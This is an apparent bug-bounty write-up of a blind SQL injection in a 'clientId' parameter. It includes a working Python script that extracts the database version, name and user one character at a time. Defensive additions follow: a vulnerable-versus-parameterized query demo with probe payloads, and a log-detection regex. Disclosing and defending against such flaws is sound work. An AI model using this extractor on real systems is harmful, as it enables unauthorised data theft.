RANK 24
Gold 24
Equivalent RMB 240
Same root cause as the previous vulnerability, so only 24.
Data package:
GET /check?clientId=64915 HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: */*
Cookie: xx
Connection: close
The clientId parameter has a boolean-based blind injection. sqlmap could not pull any data out of it, so I wrote a script to verify it.
Script
As usual, anything in the code that could reveal where the relevant information lives has been removed. This is fresh; it has not been fixed yet.
#!/usr/bin/env python3
# DATE: 1/5 16:04
# Comment: no comment

import requests

raw_url = "XXX"          # redacted by the author
burp0_cookies = {}       # XXX: redacted by the author
burp0_headers = {}       # XXX: redacted by the author

# Boolean-blind probe: one character position and one ASCII code per request.
TARGET = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid({expr},{pos},1))={code}"


def extract(expr, label, max_len=20):
    # For each position, try every printable ASCII code until the page
    # answers "true", then keep that character and move to the next position.
    value = ""
    for i in range(1, max_len):
        for j in range(32, 127):
            burp0_url = TARGET.format(expr=expr, pos=i, code=j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception:
                continue
            if "true" in res.text:
                value += chr(j)
                break
    print(label + ":", value)
    return value


extract("version()", "version")
extract("database()", "current_db")
extract("user()", "user")
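The flaw the script confirms is that the clientId value is spliced into the SQL text, so a quote in it changes the query's logic and the true/false response leaks one character per request. The following is an added illustration, not code from the report or from the affected site: a constructed SQLite-backed stand-in for the /check handler, showing the concatenating query beside a parameterized one. The table, the row ids, and the use of SQLite (unicode/substr/sqlite_version in place of MySQL's ascii/mid/version) are assumptions made for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for the endpoint's backend (assumption).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?)", [(54915, "acme"), (1, "other")])
    return conn


def check_vulnerable(conn, client_id):
    # String concatenation: the parameter becomes part of the SQL text, so a
    # quote in it ends the literal and the rest is parsed as SQL. The result
    # of the injected comparison decides the response, which is the oracle.
    sql = "SELECT COUNT(*) FROM clients WHERE id = '" + client_id + "'"
    return conn.execute(sql).fetchone()[0] > 0


def check_parameterized(conn, client_id):
    # Hardened form: validate the type the application actually expects, then
    # bind the value. A bound parameter is sent separately from the SQL text
    # and can never alter the statement's structure.
    if not client_id.isdigit():
        return False
    row = conn.execute("SELECT COUNT(*) FROM clients WHERE id = ?", (int(client_id),)).fetchone()
    return row[0] > 0


# Constructed probe values in the same shape as the report's payload, adapted
# to SQLite syntax (assumption). '--' comments out the trailing quote.
PROBE_TRUE = "0' OR unicode(substr(sqlite_version(),1,1))=51 --"   # '3' == 51: true
PROBE_FALSE = "0' OR unicode(substr(sqlite_version(),1,1))=52 --"  # '4' == 52: false


def demo():
    conn = make_db()
    return {
        "vuln_legit": check_vulnerable(conn, "54915"),
        "vuln_probe_true": check_vulnerable(conn, PROBE_TRUE),    # leaks a character
        "vuln_probe_false": check_vulnerable(conn, PROBE_FALSE),
        "fixed_legit": check_parameterized(conn, "54915"),
        "fixed_probe_true": check_parameterized(conn, PROBE_TRUE),  # no oracle
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

In the vulnerable handler the two probes return different answers for a client id that does not exist, which is exactly the signal the script above keys on; the parameterized handler returns the same answer for both, so there is nothing to extract.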
sqlmap did find it, that is, the scanner flagged it first, but sqlmap could not confirm it. The injection does exist, though, and it could be confirmed by writing a script; that is one way of thinking about it.
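Because each extracted character costs up to 95 requests to the same endpoint, this kind of verification is loud in the access log. The following is an added example, not part of the report, of how a defender would pick the pattern out of web-server logs: it parses common-log-format lines, percent-decodes the query string, strips the /**/ comment filler, and flags values that pair a quote with OR and a per-character function, then raises an alert only when one source repeats the pattern. The log lines, IP addresses and threshold are constructed for the demo.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (common log format); the probe lines mimic the shape of
# the report's payload with the quote percent-encoded, as a client library would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2018:16:04:01 +0800] "GET /check?clientId=64915 HTTP/1.1" 200 17
10.0.0.9 - - [05/Jan/2018:16:04:02 +0800] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),1,1))=32 HTTP/1.1" 200 18
10.0.0.9 - - [05/Jan/2018:16:04:02 +0800] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),1,1))=33 HTTP/1.1" 200 18
10.0.0.9 - - [05/Jan/2018:16:04:03 +0800] "GET /check?clientId=54915%27/**/or/**/ascii(mid(version(),1,1))=53 HTTP/1.1" 200 17
10.0.0.7 - - [05/Jan/2018:16:04:04 +0800] "GET /check?clientId=100 HTTP/1.1" 200 17
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A quote closing the literal, an OR, and a per-character extraction function:
# the fingerprint of boolean-blind character probing.
PROBE_RE = re.compile(r"'\s*or\b.*\b(?:ascii|ord|mid|substr|substring)\s*\(", re.IGNORECASE)


def param_values(target):
    # parse_qs percent-decodes each value; then collapse inline comments so
    # '/**/or/**/' reads as ' or ' before matching.
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {p: [re.sub(r"/\*.*?\*/", " ", v) for v in vals] for p, vals in qs.items()}


def find_probes(log_text):
    # Returns (source ip, parameter name) for every request carrying a probe.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, values in param_values(m.group("target")).items():
            if any(PROBE_RE.search(v) for v in values):
                hits.append((m.group("ip"), param))
    return hits


def alert_sources(log_text, threshold=3):
    # One odd request may be noise; a run of probes from one source is a campaign.
    counts = Counter(ip for ip, _ in find_probes(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, param in find_probes(SAMPLE_LOG):
        print("probe from", ip, "in parameter", param)
    print("alerts:", alert_sources(SAMPLE_LOG))
```

On the sample the three probe lines from 10.0.0.9 all hit the clientId parameter and the two ordinary lookups do not match, so the source is reported once the count reaches the threshold. The same check applied at the application layer (a numeric clientId should never contain a quote) would have rejected the requests outright.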
"High risk" xx a station SQL injection